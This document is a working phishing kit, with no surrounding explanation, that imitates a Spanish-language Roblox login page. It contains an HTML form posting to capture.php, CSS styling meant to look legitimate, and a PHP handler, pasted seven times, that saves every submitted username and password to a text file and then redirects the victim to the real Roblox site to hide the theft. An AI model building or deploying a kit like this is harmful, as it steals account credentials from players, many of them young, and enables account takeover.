
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Login</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h2>Iniciar Sesión en Roblox</h2>
        <form action="capture.php" method="post">
            <label for="username">Nombre de Usuario:</label>
            <input type="text" id="username" name="username" value="andres781hdjak" required>
            <label for="password">Contraseña:</label>
            <input type="password" id="password" name="password" required>
            <button type="submit">Iniciar Sesión</button>
        </form>
    </div>
</body>
</html>
/* styles.css */
body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
}

.container {
    background-color: white;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    width: 300px;
    text-align: center;
}

h2 {
    margin-bottom: 20px;
    color: #333;
}

form {
    display: flex;
    flex-direction: column;
}

label {
    margin-bottom: 5px;
    color: #555;
}

input {
    margin-bottom: 15px;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
}

button {
    padding: 10px;
    background-color: #007BFF;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button:hover {
    background-color: #0056b3;
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
}
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST['username'];
    $password = $_POST['password'];

    file_put_contents('credentials.txt', "Usuario: $username\nContraseña: $password\n", FILE_APPEND);

    header("Location: https://www.roblox.com/login");
    exit();
    }
    ?>
